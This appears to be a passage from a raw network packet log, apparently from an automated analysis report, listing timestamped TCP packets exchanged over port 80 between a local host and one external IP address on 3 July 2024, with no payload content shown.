                                                                Jul 3, 2024 08:38:19.012778997 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.012798071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.012809992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.012820005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.012830019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.012861013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.012861013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.012861013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.012861013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.013559103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013571024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013581991 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013592958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013603926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013614893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013619900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013629913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013641119 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013643980 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.013652086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013663054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013674021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013683081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.013683081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.013684988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013691902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013699055 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.013701916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013709068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013719082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013727903 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.013731003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013741970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.013748884 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.013766050 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.013778925 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.014502048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014514923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014525890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014538050 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014549017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014559984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014560938 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.014570951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014581919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014594078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014604092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014615059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014616013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.014626026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014637947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014647961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.014647961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.014650106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014661074 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014671087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.014672041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014683008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014693975 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.014693975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.014729023 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.015189886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.015213966 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.015229940 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.096606016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.096622944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.096642017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.096653938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.096664906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.096671104 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.096676111 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.096688032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.096709967 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.096755028 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.096847057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.096864939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.096888065 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.096901894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.096910000 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.096913099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.096939087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.097068071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097084045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097095013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097110987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097124100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097135067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097167015 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.097167015 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.097184896 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.097327948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097338915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097348928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097358942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097367048 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.097369909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097390890 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.097407103 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.097542048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097573996 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.097656965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097666979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097677946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097686052 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.097688913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097700119 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097707987 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.097709894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097721100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.097726107 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.097754002 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.098027945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098038912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098048925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098058939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098068953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098076105 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.098079920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098090887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098098040 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.098102093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098145008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.098145008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.098520041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098536015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098546028 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098556042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098557949 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.098562002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098571062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098581076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.098582029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098592043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098598003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098608017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098618031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.098618984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098628998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098639011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098639965 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.098644972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098654985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098658085 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.098664999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098675013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098675013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.098685980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.098695993 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.098721981 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.099288940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099301100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099312067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099323034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099325895 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.099359989 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.099410057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099421024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099431038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099441051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099442005 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.099451065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099461079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099467993 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.099471092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099482059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099490881 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099499941 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.099502087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.099519968 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.099535942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100058079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100068092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100079060 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100089073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100096941 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100099087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100110054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100112915 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100121021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100132942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100147009 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100167990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100368023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100378036 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100403070 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100418091 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100570917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100581884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100591898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100606918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100610018 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100617886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100625992 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100627899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100637913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100647926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100656986 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100657940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100667953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100677013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100677967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100687981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100696087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100697994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100708961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100714922 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100719929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100730896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.100732088 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.100763083 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.101511955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101526022 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101536036 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101547003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101555109 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.101557016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101567984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101577997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101583958 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.101588011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101598978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101608992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101618052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101624966 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.101629019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101636887 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.101639032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101650953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.101654053 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.101680040 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.102018118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.102055073 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.183754921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.183772087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.183792114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.183803082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.183814049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.183825016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.183878899 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.183878899 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.183921099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.183932066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.183942080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.183950901 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.183953047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.183959961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.183964968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.183980942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184010029 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184189081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184200048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184211016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184221029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184221983 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184231997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184253931 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184284925 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184438944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184448957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184458971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184469938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184473038 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184488058 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184506893 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184545040 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184545040 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184720993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184737921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184747934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184756994 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184758902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184770107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184773922 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184779882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184792995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184806108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184806108 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184815884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184827089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184837103 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184838057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.184856892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.184883118 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.185225010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185235977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185246944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185256004 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.185271978 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.185291052 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.185456038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185466051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185476065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185492992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185503960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185507059 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.185514927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185524940 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.185525894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185537100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185548067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185555935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.185558081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185570002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185579062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185580969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.185590982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185595036 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.185601950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185614109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.185625076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.185652018 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.186275005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186285973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186295986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186306000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186311007 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.186316967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186326981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186330080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.186336994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186347961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186357975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186367989 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186369896 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.186379910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186388969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.186389923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186399937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186405897 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.186410904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186415911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186422110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186424971 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.186427116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.186484098 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.187004089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187016964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187052965 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.187083960 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.187236071 CEST804971085.28.47.4192.168.2.6
